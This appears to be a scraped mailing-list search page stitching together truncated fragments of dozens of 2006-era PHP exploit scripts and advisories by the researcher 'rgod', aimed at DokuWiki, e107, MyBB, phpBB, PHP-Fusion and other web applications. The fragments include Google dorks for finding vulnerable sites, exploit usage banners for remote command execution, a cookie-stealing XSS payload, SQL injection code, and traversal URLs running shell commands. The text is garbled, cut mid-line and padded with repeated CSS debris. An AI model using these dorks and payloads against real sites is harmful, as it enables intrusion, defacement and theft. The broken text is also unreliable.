#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
dork: "Driven by DokuWiki"
');
/*
works with register_argc_argv = On
*/
if ($argc<4) {
print_r('
-
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
');
/*
works with
register globals = *Off*
magic_quotes_gpc = Off
explaination:
vulnerable code in maincore.php at lines 15-21:
...
if
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files
');
/*
works with register_globals=On
against PHP < 4.4.1, 5
php/zend_hash_del_key_or_index_vulnerability.html
SMF team released 1.0.8 and 1.1.rc3 versions to patch theese issues
----
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
ecart]/admin/login.php?email=";>alert(document.cookie)
----
rgod 17/08/20067.15.36
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/cubecart_3011_adv.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by XMB\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path username password cmd OPTIONS\n";
echo "host: target server (ip/hostname)\
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by sendcard - an advanced PHP e-card program\"\n\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path action [location] [cmd] OPTIONS\n";
echo "host: target server (ip/hostname)\n";
ec
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork, version specific: \"Web site engine's code is copyright\"
\"2001-2006 ATutor\" \"About ATutor\"\n\n";
/*
- works regardless of php.ini settings
- with Mysql >= 4.1 (allowing SELECT subqueries for ORDER BY
.$thisIp."'".' or banip='."'".$thisIpMask[0]."'".' or //<--- sql
injection
banip='."'".$thisIpMask[1]."'".' or banip='."'".$user_id."'");
echo mysql_error();
if($res and mysql_num_rows($res)>0) return TRUE; else return FALSE;
}
1.05 29/07/2006
rgod
http://retrogod.altervista.org/php_ip2long.htm
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "google dork: \"Content managed by the Etomite Content Management
System\"\r\n\r\n";
/*
works regardless of php.ini settings
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)
just modified the geeklog one to works against toenda, poc:
http://retrogod.altervista.org/toenda_100_shizouka_xpl.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server
r than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"This forum powered by Phorum.\"\n\n";
/*
works with:
register_globals=On
magic_quotes_gpc=Off
*/
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\n";
echo "host: targe
rgod
site: http://rgod.altervista.org
mail: rgod @ autistici.org
original url: http://retrogod.altervista.org/flatnuke257_adv.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" |
\"powered by cms papoo\"\n\n";
/*
notes:
works regardless of magic_quotes_gpc settings...
there is some magic quotes disable code in variabl
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dorks: \"Powered byPivot\"\n";
echo "version specific: \"Powered byPivot - 1.30 RC2\" +Rippersnapper\n\n";
/*
works with register_globals=On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTION
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004,
Radek Hulán\"\n\n";
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" |
inurl:?gadget=search\r\n\r\n";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/
if ($argc<3) {
echo "Usage: php ".$argv[
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "this is called the Sun-Tzu 'trascendental guru meditation'
tecnique\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by bitweaver\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to bitweaver\r\n";
ec
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by blur6ex\"\r\n\r\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\"
\"Valid XHTML 1.0 Strict and CSS\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0].
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\"
+commentaires\r\n\r\n";
/*
works with PHP5
register_globals=On,
allow_url_fopen=On
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path ft
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid
CSS\"\r\n\r\n";
/*
works with:
magic_quotes_gpc=Off
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n";
echo
in all mentioned files we have:
...
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
...
so I would like to see how this can work...
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: intext:\"Powered by pppblog\"\r\n\r\n";
/*
works with:
register_globals=On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path path_to_file OPTIONS\r\n";
echo "host: target server (i
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org |\r\n";
echo "| dork: inurl:wp-login.php Register Username Password -echo|\r\n";
echo "\r\n";
/*
this works:
regardles
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
/*
this works with a user account with upload rights and with permissions to modify
stories, however this is only a poc, you can do the same uploading an attachment
through any module, like this, with double exte
ger/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
---
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
---
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS
. Back to top\r\n\r\n";
/*
works with:
register_globals=Om
allow_url_fope
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
/*
works with:
magic_quotes_gpc = Off
register_globals = On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path:
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "tested & working against a fresh deluxebb installation\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: pat
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PHP-Fusion\r\n";
echo "user/pass: you need an account\r\
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path:
an admin or whoever succeed to find admin sid is able to launch commands,
advisory/poc exploit:
http://retrogod.altervista.org/phpbb_2020_admin_xpl.html
TTP/1.0
HOST: some_vulnerable.host
Connection: close
obviously you have no output, but this makes phpbb to be like a http proxy
(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code c
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
ech
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PHPFusion\r\n";
echo "cmd: a shell command\r\n
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo " if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
if ($argc<4) {
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org *\r\n";
echo "* a special tnX goes to Frozen for his dork! *\r\n";
echo "* and a thanks to all people of johnny.ihackstuff.com!!*\r\n";
echo "* site: http://retrogod.altervista.org
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n
o insert html/
/javascript code or simply deface the main page
temporary patch -> replace this line:
...
if ($updwelcome && isset($welcomedata) && check_welcome($dir)) {
...
with:
...
if ($admin && $updwelcome && isset($welcomedata) && check_welcome($dir
print nl2br(htmlentities(implode($readme, ' ')));
print "Continue\n";
print "\n";
exit;
}
}
...
google search:
inurl:"extras/update.php" intext:mysql.p
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: intext:\"Powered by simplog\"\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to simplog
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> this works against register_globals=On \r\n";
echo "a dork: inurl:\"lists/?p=subscribe\" |
inurl:\"lists/index.php?p=subscribe\"\r\n";
echo " -ubbi phplist\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: Welcome to your PHPOpenChat-Installation!\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PhpO
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc=Off\r\n\r\n";
echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: t
http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."
vulnerability:
ReloadCMS do not properly sanitize User-Agent request header before to store it
in stats.dat file.
Example of attack, through netcat:
rgod>nc target.ho
ost: [host]
Connection: Close
iii) information disclosure, you can go to:
http://[target]/[path]/checktables.php
to see at screen database table_prefix, making easier the exploitation
process...
---
his can be exploited to
include files having the template file extension (".html") from local resources
via directory traversal attacks"
and classified it as low risk... this is true on PHP5 but not on PHP4 where you
can break the .html extension by a null char
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/4images_171_adv.html
ize: 0.8em
!important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !i
arget]/[path]/docs/showdoc.php?f=c:\boot.ini
http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php
(the last one from a samba resource...)
if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini"
(cause striplashes do not remove all "\"s )
and "\
font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size:
rtant} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:li
t} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-
SER | ERROR | 20060211 035519 | 192.168.1.5 | User : login failed!
now, if magic_quotes_gpc = Off on target system, you can launch operating system
commands, poc:
http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00
(same technique with install dir scripts...)
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
original adivsory: http://retrogod.altervista.org/linpha_10_local.html
FCKEditor 2.0 <= 2.2)
--
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
--
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Ve
text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
61 matches
Mail list logo